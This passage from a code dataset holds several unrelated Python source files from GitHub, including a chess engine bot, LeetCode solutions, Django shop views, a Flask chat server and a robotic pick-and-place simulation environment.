open(ROOT_DIR+\"/html/%s\" % dst_name, \"w\") as f:\n f.write(page.content.decode(\"utf-8\"))\n with open(ROOT_DIR+\"/log.txt\", \"a\") as f:\n f.write(\"%s\\n%s\\n\\n\" % (url, dst_name))\n\n # print(\"now, it is in cache\")\n return ROOT_DIR+\"/html/\"+dst_name\n\ndef get_etree_handler(url):\n filename = get_html_filename(url)\n with open(filename, \"r\") as f:\n c = f.read()\n\n from lxml import etree\n return etree.HTML(c)\n\nif __name__ == '__main__':\n get_html_filename(\"https://www.baidu.com\")","repo_name":"longuan/python-script","sub_path":"saveHTML/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"8055681804","text":"from math import inf\nfrom piece import Piece\nfrom utils import calculate_total_score\nfrom typing import Tuple, DefaultDict, Optional\n\n\nclass Bot:\n def __init__(self, board, depth=3):\n self.board = board\n self.depth = depth\n\n def play(self, color=\"black\", grid=None):\n return self.get_negamax_move(self.depth, color, grid)\n\n def calculate_movement_score(self, p1, p2, grid=None):\n # If no grid is provided, use the board grid as default\n if not grid:\n grid = self.board.grid\n\n # Clone the grid, to simulate the movement and calculate the new board score.\n tmp = 
self.board.clone_grid(grid)\n        # Move the piece from p1 to p2\n        tmp[p2], tmp[p1] = tmp[p1], None\n\n        return tmp, calculate_total_score(tmp)\n\n    def quiescence_search(self, grid, alpha, beta):\n        \"\"\"\n        Quiescence search is required to avoid moves that are dangerous.\n        As explained here: https://www.chessprogramming.org/Quiescence_Search\n        \"\"\"\n        last_score = calculate_total_score(grid)\n\n        if last_score >= beta:\n            return beta\n        alpha = max(alpha, last_score)\n\n        new_moves = self.board.filter_illegal_moves(\n            self.board.get_color_all_moves(\"black\", grid), \"black\"\n        )\n\n        for move in new_moves:\n            if self.board.is_capture_move(move, grid):\n                tmp = self.board.clone_grid(grid)\n                (s, e) = move\n                # Move the piece from s to e\n                tmp[e] = tmp[s].clone()\n                tmp.pop(s)\n\n                # Recurse on the position after the capture (tmp), not the\n                # original grid, otherwise the capture is never evaluated.\n                score = -self.quiescence_search(tmp, -beta, -alpha)\n\n                if score >= beta:\n                    return beta\n                if score > alpha:\n                    alpha = score\n\n        return alpha\n\n    def negamax(\n        self,\n        depth,\n        grid: DefaultDict[Tuple[int, int], Optional[Piece]],\n        is_maximizing,\n        alpha,\n        beta,\n    ):\n        if depth == 0:\n            return -self.quiescence_search(grid, alpha, beta)\n\n        # Get all the moves possible on the new grid.\n        new_moves = self.board.filter_illegal_moves(\n            self.board.get_color_all_moves(\"black\", grid), \"black\"\n        )\n\n        best_score = -inf\n        for (s, e) in new_moves:\n            # Clone the grid so movement can be done without impacting the game.\n            tmp = self.board.clone_grid(grid)\n\n            # Move the piece from s to e\n            tmp[e] = tmp[s].clone()\n            tmp.pop(s)\n\n            # Ignore illegal moves\n            if self.board.is_color_in_check(\"black\", tmp):\n                continue\n\n            score = -self.negamax(depth - 1, tmp, not is_maximizing, -beta, -alpha)\n\n            if score >= beta:\n                return score\n            if score > best_score:\n                best_score = score\n            if score > alpha:\n                alpha = score\n\n        return best_score\n\n    def get_negamax_move(self, depth=3, color=\"black\", grid=None):\n        if not grid:\n            grid = self.board.grid\n\n        best_next_score = -inf\n        best_next_node = None\n\n        alpha = -inf\n        beta = inf\n\n        # Go through all the children and choose the next move that should be done.\n        for (s, e) in self.board.filter_illegal_moves(\n            self.board.get_color_all_moves(\"black\", grid), \"black\"\n        ):\n            tmp = self.board.clone_grid(grid)\n            # Move the piece from s to e\n            tmp[e] = tmp[s].clone()\n            tmp.pop(s)\n\n            # Ignore illegal moves\n            if self.board.is_color_in_check(\"black\", tmp):\n                continue\n\n            node_minimax = self.negamax(depth - 1, tmp, color == \"white\", -beta, -alpha)\n\n            if best_next_score < node_minimax:\n                best_next_score = node_minimax\n                best_next_node = (s, e)\n\n            if node_minimax > alpha:\n                alpha = node_minimax\n\n        return best_next_node\n","repo_name":"TriForMine/py-chess-tk","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40014213438","text":"#\n# @lc app=leetcode.cn id=1376 lang=python3\n#\n# [1376] Time Needed to Inform All Employees\n#\n\n# @lc code=start\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n    def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int:\n        dct = defaultdict(list)\n        for i in range(n):\n            dct[manager[i]].append(i)\n\n        def dfs(pre, root):\n            nonlocal ans\n            if not dct[root]:\n                if pre > ans:\n                    ans = pre\n                return\n            for nex in dct[root]:\n                dfs(pre+informTime[root], nex)\n            return\n\n        ans = 0\n        dfs(0, headID)\n        return ans\n\n# @lc 
code=end\n\n","repo_name":"vitotse/Leetcode-vscode","sub_path":"leetcode/1376.通知所有员工所需的时间.py","file_name":"1376.通知所有员工所需的时间.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4879308281","text":"from collections import defaultdict\nimport heapq\n\nclass Solution:\n def impl(self, s):\n char_count = defaultdict(int)\n # count of each characters\n for c in s:\n char_count[c] += 1\n freq_count = defaultdict(int)\n # count of each frequency\n for freq in char_count.values():\n freq_count[freq] += 1\n max_heap = [(-freq, count) for freq, count in freq_count.items()]\n max_heap.append((0, 0))\n heapq.heapify(max_heap)\n deletes = 0\n # drop one character at a time\n while len(max_heap) > 1:\n f1, c1 = heapq.heappop(max_heap)\n f2, c2 = heapq.heappop(max_heap)\n delta = c1 - 1\n f1 += 1\n deletes += delta\n if f1 == f2 and c2 + delta > 1:\n heapq.heappush(max_heap, (f2, c2 + delta))\n else:\n if delta > 1:\n heapq.heappush(max_heap, (f1, delta))\n heapq.heappush(max_heap, (f2, c2))\n return deletes\n\nif __name__ == '__main__':\n s = Solution()\n ans = s.impl(\"example\")\n print(ans)\n\n","repo_name":"ZhouningMan/LeetCodePython","sub_path":"mscodility/MinDeletionsToMakeFrequencyOfEachLetterUnique.py","file_name":"MinDeletionsToMakeFrequencyOfEachLetterUnique.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31343450361","text":"from flask import Flask, render_template, url_for\nfrom flask_socketio import SocketIO, send\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = \"123\"\n\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\n\n@socketio.on(\"message\")\ndef handler_message(message):\n send(message, broadcast=True)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n socketio.run(app)","repo_name":"YaroslavOvchinnikov/test_task_Datagrok","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20705678579","text":"from django.db.models import Count, Q\r\nfrom django.shortcuts import render\r\nfrom django.views import View\r\nfrom django.views.generic import ListView, DetailView\r\nfrom django.http import HttpRequest, HttpResponse\r\nfrom site_module.models import SiteBanner\r\nfrom utils import http_service, convertors\r\n\r\nfrom . 
import models\r\n\r\n\r\nclass ProductListView(ListView):\r\n template_name = 'product_module/product_list.html'\r\n model = models.Products\r\n paginate_by = 9\r\n context_object_name = 'products'\r\n ordering = ['-id']\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(ProductListView, self).get_context_data(**kwargs)\r\n query = models.Products.objects.all()\r\n product: models.Products = query.order_by('-price').first()\r\n db_max_price = product.price if product is not None else 0\r\n context['db_max_price'] = db_max_price\r\n context['start_price'] = self.request.GET.get('start_price') or 0\r\n context['end_price'] = self.request.GET.get('end_price') or db_max_price\r\n context['banners'] = SiteBanner.objects.filter(is_active=True,\r\n position__iexact=SiteBanner.SiteBannerPositions.product_list)\r\n return context\r\n\r\n def get_queryset(self):\r\n query = super(ProductListView, self).get_queryset()\r\n category_name = self.kwargs.get('cat')\r\n brand_name = self.kwargs.get('brand')\r\n request: HttpRequest = self.request\r\n start_price = request.GET.get('start_price')\r\n end_price = request.GET.get('end_price')\r\n if start_price is not None:\r\n query = query.filter(price__gte=start_price)\r\n\r\n if end_price is not None:\r\n query = query.filter(price__lte=end_price)\r\n\r\n if brand_name is not None:\r\n query = query.filter(brand__url_title__iexact=brand_name)\r\n\r\n if category_name is not None:\r\n query = query.filter(category__url_title__iexact=category_name)\r\n return query\r\n\r\n\r\nclass ProductDetailView(DetailView):\r\n model = models.Products\r\n template_name = 'product_module/product_detail.html'\r\n context_object_name = 'product'\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super().get_context_data(**kwargs)\r\n loaded_product = self.object\r\n request = self.request\r\n # favorite_product_id = request.session.get(\"product_favorites\")\r\n # context['is_favorite'] = favorite_product_id == str(loaded_product.id)\r\n context['banners'] = SiteBanner.objects.filter(is_active=True,\r\n position__iexact=SiteBanner.SiteBannerPositions.product_detail)\r\n galleries = list(models.ProductGallery.objects.filter(product_id=loaded_product.id).all())\r\n galleries.insert(0, loaded_product)\r\n context['product_galleries_group'] = convertors.group_list(galleries, 3)\r\n context['related_products'] = convertors.group_list(list(\r\n models.Products.objects.filter(brand_id=loaded_product.brand_id).exclude(pk=loaded_product.id).all()[:12]),\r\n 3)\r\n\r\n # -----------------\r\n context['comments'] = models.ProductComment.objects.filter(product_id=loaded_product.id, parent=None,\r\n is_read_by_admin=True).order_by(\r\n '-create_date').prefetch_related('productcomment_set')\r\n context['comments_count'] = models.ProductComment.objects.filter(product_id=loaded_product.id,\r\n is_read_by_admin=True).count()\r\n # ----------------------\r\n user_ip = http_service.get_client_ip(self.request)\r\n user_id = None\r\n if self.request.user.is_authenticated:\r\n user_id = self.request.user.id\r\n\r\n has_been_visited = models.ProductVisit.objects.filter(ip__iexact=user_ip, product_id=loaded_product.id).exists()\r\n\r\n if not has_been_visited:\r\n new_visit = models.ProductVisit(ip=user_ip, user_id=user_id, product_id=loaded_product.id)\r\n new_visit.save()\r\n\r\n return context\r\n\r\n\r\ndef product_categories_partial(request: HttpRequest):\r\n print('fuck you')\r\n product_categories = 
models.ProductCategory.objects.filter(is_active=True, is_delete=False)\r\n context = {\r\n 'categories': product_categories\r\n }\r\n return render(request, 'product_module/partial_view/product_category_partial.html', context)\r\n\r\n\r\ndef product_brands_partial(request: HttpRequest):\r\n product_brands = models.ProductBrand.objects.annotate(products_count=Count('products')).filter(is_active=True)\r\n context = {\r\n 'brands': product_brands\r\n }\r\n return render(request, 'product_module/partial_view/product_brands_partial.html', context)\r\n\r\n\r\ndef add_product_comment(request: HttpRequest):\r\n if request.user.is_authenticated:\r\n product_id = request.GET.get('product_id')\r\n product_comment = request.GET.get('product_comment')\r\n parent_id = request.GET.get('parent_id')\r\n # print(article_id, article_comment, parent_id)\r\n new_comment = models.ProductComment(product_id=product_id, message=product_comment, user_id=request.user.id,\r\n parent_id=parent_id)\r\n new_comment.save()\r\n context = {\r\n 'comments': models.ProductComment.objects.filter(product_id=product_id, parent=None,\r\n is_read_by_admin=True).order_by(\r\n '-create_date').prefetch_related('productcomment_set'),\r\n 'comments_count': models.ProductComment.objects.filter(product_id=product_id, is_read_by_admin=True).count()\r\n }\r\n\r\n return render(request, 'includes/product_comment_partial.html', context)\r\n\r\n return HttpResponse('response')\r\n\r\n\r\ndef searcher(request):\r\n search = request.GET.get('search')\r\n # models.Products.\r\n products: models.Products = models.Products.objects.filter(\r\n Q(title__icontains=search) | Q(slug__icontains=search) | Q(short_description__icontains=search) | Q(\r\n keyword__icontains=search))\r\n context = {\r\n 'products': products\r\n }\r\n\r\n return render(request, 'product_module/search_page.html', context=context)\r\n","repo_name":"omidtri/django_site","sub_path":"product_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39288166211","text":"\"\"\"new columns for galaxy\n\nRevision ID: fd96049a5c3b\nRevises: 2b31c874c521\nCreate Date: 2019-04-05 15:53:55.492769\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fd96049a5c3b'\ndown_revision = '2b31c874c521'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('galaxy', sa.Column('bands', sa.String(length=64), nullable=True))\n op.add_column('galaxy', sa.Column('fov', sa.REAL(), nullable=True))\n op.create_index(op.f('ix_galaxy_bands'), 'galaxy', ['bands'], unique=False)\n op.create_index(op.f('ix_galaxy_fov'), 'galaxy', ['fov'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_galaxy_fov'), table_name='galaxy')\n op.drop_index(op.f('ix_galaxy_bands'), table_name='galaxy')\n op.drop_column('galaxy', 'fov')\n op.drop_column('galaxy', 'bands')\n # ### end Alembic commands ###\n","repo_name":"felixrichards/Project-Web-App","sub_path":"migrations/versions/fd96049a5c3b_new_columns_for_galaxy.py","file_name":"fd96049a5c3b_new_columns_for_galaxy.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71421849048","text":"from environments.environment import PickPlaceEnv,BOUNDS,PIXEL_SIZE\nfrom tasks.task import PutBlockInBowl,PickBlock\nfrom environments.timer import limit_decor\nimport numpy as np\nimport pybullet\nimport cv2\nfrom reward.prompt import get_prompt,ask_LLM,interme_reward\nfrom reward.prompt_withoutVild import get_description,motion_descriptor,translator\nfrom reward.detector import VILD\nfrom environments.utils import *\n# from gym import spaces\nfrom gymnasium import spaces\nimport torch as th\nimport clip\nimport time\nfrom PIL import Image\nimport time\n\nclass TestEnv(PickPlaceEnv):\n def __init__(self, task):\n super().__init__(task)\n self.vlm = VILD()\n def get_reward(self,obs,action):\n time_penalty = -0.05\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n moved = False\n for key in self.obj_name_to_id.keys():\n if np.linalg.norm(np.array(pos[key]) - np.array(self.obj_pos[key])) > 0.01:\n moved = True\n if not moved:\n return time_penalty,False\n else:\n img = cv2.cvtColor(obs[\"image\"],cv2.COLOR_RGB2BGR)\n cv2.imwrite('reward/tmp/color.png',img)\n found_objects_ap,_ = self.vlm.vild_detect('reward/tmp/color.png',self.task.category_names,verbose=True)\n text = get_prompt(obs[\"lang_goal\"],self.found_objects,found_objects_ap)\n print(\"text:\",text)\n ans = ask_LLM(text)\n print(\"ans:\",ans)\n if ans:\n reward = 1\n return 1,True\n else:\n reward = -time_penalty\n print(\"found objects:\",self.found_objects)\n dense_reward = interme_reward(motion_descriptor(obs[\"lang_goal\"],self.found_objects),action)\n reward += dense_reward\n return reward,False\n\n # TODO: check did the robot follow text instructions?\n def reset_reward(self,obs):\n img = cv2.cvtColor(obs[\"image\"],cv2.COLOR_RGB2BGR)\n cv2.imwrite('reward/tmp/color.png',img)\n self.found_objects,_ = self.vlm.vild_detect('reward/tmp/color.png',self.task.category_names,verbose=True)\n print(\"fond objects in reset\",self.found_objects)\n\nclass PickOrPlaceEnvWithoutLangReward(PickPlaceEnv):\n # choose pick/place instead of pick_and_place\n\n def __init__(self, task,render=False):\n super().__init__(task,render=render)\n image_size = (224,224)\n self.image_size = image_size\n self.height_coef = 20\n #TBD: change the observation space\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, 1, image_size + (4,), dtype=np.float32),\n \"lang_goal\": spaces.Box(-5, 5, (512,), dtype=np.float32),\n \"clip_image\": spaces.Box(-5, 5, (512,), dtype=np.float32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n \"lang_recommendation\": spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32),\n })\n # self.observation_space = spaces.Dict({\"image\":spaces.Box(0, 1, image_size + (4,), dtype=np.float32)})\n # self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32)\n self.action_space = 
spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, image_size[0], image_size[1]]),dtype=np.int16)\n self.max_steps = 10\n self.clip_model, self.clip_preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\n\n def reset(self,seed = None):\n self.last_pick_success = 0\n self.info = {\n \"step_result\":['initialization'],\n \"LLM_recommendation\":[],\n \"obj_position\":[],\n }\n return super().reset()\n\n\n\n def step(self, action=None):\n start_time = time.time()\n print(\"lang goal\",self.lang_goal)\n \"\"\"Do pick and place motion primitive.\"\"\"\n height = self.last_observation[\"depth\"]\n pick_success = 0\n # Move to object.\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n max_time = 3\n if len(action.shape) == 2:\n action = action.squeeze(0)\n pix = action[1:].copy()\n # print(np.array(self.action_space.high[1:]))\n # position of objects\n pos = {}\n TRUE_ACT = False\n for key in self.obj_name_to_id.keys():\n _pos = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n if key in self.task.config[\"pick\"]:\n max_dis = 15\n if key in self.task.config[\"place\"]:\n max_dis = 25\n _pos_pix = xyz_to_pix(_pos,BOUNDS,PIXEL_SIZE)\n # print(np.linalg.norm(_pos_pix-pix),_pos_pix,pix)\n if np.linalg.norm(_pos_pix-pix) < max_dis:\n \n TRUE_ACT = True\n break\n if self.observation[\"object_in_hand\"][0] == 1:\n TRUE_ACT = True\n if not TRUE_ACT:\n print(\"@@@@@@@@@@@@action out of meaningless\")\n\n\n # print(\"pos:\",pos)\n if action[0] < 0.5 and TRUE_ACT:\n #pick\n self.gripper.release()\n pick_pix = pix\n\n pick_pix = pick_pix.astype(np.int32)\n pick_pix = np.clip(pick_pix,[0,0],[self.image_size[0]-1,self.image_size[1]-1])\n # print(pick_pix,height, BOUNDS,PIXEL_SIZE)\n pick_xyz = pix_to_xyz(pick_pix,height, BOUNDS,PIXEL_SIZE,pick=True)\n hover_xyz = pick_xyz.copy() + np.float32([0, 0, 0.2])\n print(\"steping pick: \", pick_xyz)\n\n moving_time = 0\n while np.linalg.norm(hover_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(hover_xyz,5)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n\n moving_time = 0\n while np.linalg.norm(pick_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(pick_xyz)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n\n # Pick up object.\n self.gripper.activate()\n for _ in range(240):\n self.step_sim_and_render()\n moving_time = 0\n while np.linalg.norm(hover_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(hover_xyz,2)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n hover_xyz = np.float32([0, -0.2, 0.4])\n moving_time = 0\n while np.linalg.norm(hover_xyz - ee_xyz) > 0.01:\n self.movep(hover_xyz,2)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n pick_success = int(self.gripper.check_grasp())\n \n print(\"pick_success\",pick_success)\n\n\n elif action[0] > 0.5 and TRUE_ACT:\n #place\n place_pix = pix\n place_pix = place_pix.astype(np.int32)\n place_pix = np.clip(place_pix,[0,0],[self.image_size[0]-1,self.image_size[1]-1])\n place_xyz = pix_to_xyz(place_pix,height, 
BOUNDS,PIXEL_SIZE,pick=False)\n print(\"steping: place\", place_xyz)\n\n # Move to place location.\n moving_time = 0\n while np.linalg.norm(place_xyz - ee_xyz) > 0.01:\n moving_time+= self.dt\n self.movep(place_xyz)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time>max_time:\n print(\"moving time out\")\n break\n\n # Place down object.\n moving_time = 0\n print(\"place_xyz[2]\",place_xyz[2],self.gripper.detect_contact())\n while (self.gripper.detect_contact()) and (place_xyz[2] > 0.03):\n \n moving_time+= self.dt\n place_xyz[2] -= 0.001\n self.movep(place_xyz)\n for _ in range(3):\n self.step_sim_and_render()\n if moving_time>max_time:\n print(\"moving time out\")\n break\n self.gripper.release()\n for _ in range(240):\n self.step_sim_and_render()\n place_xyz[2] = 0.2\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n moving_time = 0\n while np.linalg.norm(place_xyz - ee_xyz) > 0.01:\n self.movep(place_xyz,5)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n\n place_xyz = np.float32([0, -0.2, 0.4])\n moving_time = 0\n while np.linalg.norm(place_xyz - ee_xyz) > 0.01:\n self.movep(place_xyz,5)\n self.step_sim_and_render()\n ee_xyz = np.float32(pybullet.getLinkState(self.robot_id, self.tip_link_id)[0])\n if moving_time > max_time:\n print(\"moving time out\")\n break\n # position of objects\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n \n\n res = get_description(self,action,pick_success,pos,last_pos=self.obj_pos)\n \n print(\"res:\",res)\n self.info[\"step_result\"].append(res)\n obs_start_time = time.time()\n observation = self.get_observation(pick_success)\n \n reward,done = self.get_reward(observation,action,pos=pos,last_pos=self.obj_pos)\n # record as last position\n self.obj_pos = pos\n self.last_pick_success = pick_success\n self.step_count += 1\n print(\"action \",action,\"reward\",reward)\n print(\"###############time:\",time.time()-start_time,\"obs time:\",time.time()-obs_start_time)\n print(\"observation:\",observation)\n info = self.get_info()\n return observation, reward, done,False, info\n def get_info(self):\n return self.info\n \n def get_observation(self,pick_success=0):\n\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n self.info[\"obj_position\"].append(pos)\n obs = super().get_observation()\n #\"image\" \"depth\" \"xyzmap\" \"lang_goal\"\n self.last_observation = obs\n observation = {} # image(RGBD) lang_goal(encoded) object_in_hand(bool)\n # print(\"obs\",obs[\"image\"].shape,obs[\"image\"].dtype,obs[\"image\"].max(),obs[\"image\"].min())\n img = obs[\"image\"]/255\n img = np.concatenate([img,self.height_coef*obs[\"depth\"][..., None]],axis=-1)\n # print(\"img shape\",img.shape)\n # print(\"depth shape\",obs[\"depth\"][..., None].shape)\n observation[\"image\"] = img\n observation['object_in_hand'] = np.array([pick_success])\n lang_goal = clip.tokenize(obs['lang_goal'])\n with th.no_grad():\n embedding = self.clip_model.encode_text(lang_goal)\n clip_image = Image.fromarray(obs[\"image\"])\n clip_image = self.clip_preprocess(clip_image).unsqueeze(0).to(\"cpu\")\n clip_image = self.clip_model.encode_image(clip_image)\n # 
print(\"clip_image\",clip_image.shape,clip_image.dtype,clip_image.max(),clip_image.min())\n observation['lang_goal'] = embedding.numpy()\n observation['clip_image'] = clip_image.numpy()\n # clip_image.show()\n # print(\"lang_goal\",observation['lang_goal'].dtype)\n \n llm_expert = True\n # for saving money and time: when nothing done, do not prompt LLM\n if len(self.info[\"step_result\"])>1:\n changed = False\n for result in self.info[\"step_result\"][1:]:\n if result != \"pick up nothing\" and result != \"place nothing\":\n changed = True\n break\n if not changed:\n llm_expert = False\n else:\n llm_expert = False\n #forced to not prompt llm\n llm_expert = False\n \n # prompting LLM\n if llm_expert:\n try:\n motion_description=motion_descriptor(self.lang_goal,self.info)\n LLM_action = translator(motion_description,self.info)\n LLM_action[1:] = np.array(LLM_action[1:])/np.array(self.image_size)\n except:\n LLM_action = np.zeros((3,))\n else:\n pick_idx = self.task.goals[0]\n pick_pos = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[self.task.config[\"pick\"][pick_idx]])[0]\n pix = xyz_to_pix(pick_pos,BOUNDS,PIXEL_SIZE)\n LLM_action = np.array([0,pix[0]/self.image_size[0],pix[1]/self.image_size[1]])\n # print(\"LLM_action\",LLM_action)\n observation['lang_recommendation'] = np.array(LLM_action)\n self.info[\"LLM_recommendation\"].append(LLM_action)\n self.observation = observation \n # print(\"image\",img.shape,observation[\"image\"].dtype,img.max(),img.min())\n # print(self.info[\"step_result\"],llm_expert)\n\n # print(\"lang_goal:\",observation['lang_goal'].shape,observation['lang_goal'].dtype,observation['lang_goal'].max(),observation['lang_goal'].min())\n return observation\n def super_get_observation(self):\n return super().get_observation()\n def get_reward(self,observation,action,pos,last_pos):\n # todo cross entropy loss\n phase_penalty = 0.2\n damage_penalty = 0.25\n done = False\n if self.step_count >= self.max_steps:\n done = True\n time_penalty = -0.05\n\n moved = False\n for key in self.obj_name_to_id.keys():\n if np.linalg.norm(np.array(pos[key]) - np.array(last_pos[key])) > 0.01:\n moved = True\n if out_of_bound(pos[key],BOUNDS):\n done = True\n return -damage_penalty,done\n \n # loss for not following the recommendation\n LLM_loss = 0\n # LLM_action = self.info[\"LLM_recommendation\"][-2]\n # action_primitive = action[0]\n # if action_primitive < 0.5:\n # action_primitive = 0\n # else:\n # action_primitive = 1\n # if LLM_action[0] != action_primitive:\n # LLM_loss += -phase_penalty\n # else:\n # dis = np.linalg.norm(np.array(self.image_size)*action[1:]-np.array(self.image_size)*np.array(LLM_action[1:]))\n # print(\"dis:\",dis)\n # LLM_loss = 0.05*5/(dis+5)\n # if (LLM_action == np.zeros((3,))).all():\n # LLM_loss = 0\n if not moved:\n return time_penalty+LLM_loss,done\n reward,_done = self.task.get_reward(self)\n done |= _done\n \n if done:\n print(\"reward:\",reward,\"done:\",done)\n return reward,done\n else:\n reward = time_penalty+LLM_loss\n # for phase: if it already pick up the object, punish it if it not put down the object\n if self.last_pick_success == 1:\n if action[0] < 0.5:\n reward += -phase_penalty\n if action[0] > 0.5:\n if self.last_pick_success == 0:\n reward += -phase_penalty\n print(\"reward:\",reward,\"done\",done)\n return time_penalty,done\n\n\n def reset_reward(self, obs):\n return 0,False\n\n @limit_decor(10, 1.)\n def prompt_llm_func(self):\n motion_description=motion_descriptor(self.lang_goal,self.info)\n LLM_action = 
translator(motion_description,self.info)\n LLM_action[1:] = np.array(LLM_action[1:])/np.array(self.image_size)*self.action_space.high[1:]\n return LLM_action\n \n def prompt_llm(self):\n try:\n # print(\"########################prompting LLM\")\n LLM_action = self.prompt_llm_func()\n if LLM_action is None:\n LLM_action = np.zeros((3,))\n except:\n LLM_action = np.zeros((3,))\n return LLM_action\n \ndef out_of_bound(pos,BOUNDS):\n _pos = pos\n # print(BOUNDS,pos)\n if (np.array(_pos)[:2] < BOUNDS[:2,0]).any() or (np.array(_pos)[:2] > BOUNDS[:2,1]).any():\n if (np.array(_pos)[2:] < BOUNDS[2:,1]).any():\n print(\"out of bound\")\n return True\n else:\n return False\nclass SimplifyPickOrPlaceEnvWithoutLangReward(PickOrPlaceEnvWithoutLangReward):\n def __init__(self,render=False):\n task = PutBlockInBowl\n super().__init__(task,render)\n image_size = (224,224)\n self.image_size = image_size\n self.height_coef = 20\n #TBD: change the observation space\n obj_num = len(self.task.category_names)\n goal_num = 2\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, image_size[0], (obj_num*2,), dtype=np.int32),\n \"lang_goal\": spaces.Box(0, obj_num, (goal_num,), dtype=np.int32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n })\n # self.observation_space = spaces.Dict({\"image\":spaces.Box(0, 1, image_size + (4,), dtype=np.float32)})\n # self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32)\n self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, image_size[0], image_size[1]]),dtype=np.float32)\n self.max_steps = 10\n # self.epsilon = 0.5\n self.clip_model, self.clip_preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\n\n def get_observation(self,pick_success=0):\n\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n self.info[\"obj_position\"].append(pos)\n pos_list = []\n for key in self.task.config['pick']:\n pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n for key in self.task.config['place']:\n pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n \n # print(\"task config\",self.task.config)\n obs = super().super_get_observation()\n #\"image\" \"depth\" \"xyzmap\" \"lang_goal\"\n self.last_observation = obs\n observation = {} # image(RGBD) lang_goal(encoded) object_in_hand(bool)\n observation['image'] = pos_list #pesudo image with position sequence\n observation['object_in_hand'] = np.array([pick_success])\n lang_goal = self.task.goals\n observation['lang_goal'] = lang_goal\n self.observation = observation\n return observation\n\n # clip_image.show()\n # print(\"lang_goal\",observation['lang_goal'].dtype)\n def get_reward(self,observation,action,pos,last_pos):\n phase_penalty = 0.25\n damage_penalty = 0.25\n done = False\n time_penalty = -0.05\n reward = 0\n desired_primitive = self.last_pick_success\n if self.last_pick_success:\n desired_position = last_pos[self.task.config['place'][self.task.goals[1]]]\n desired_position = 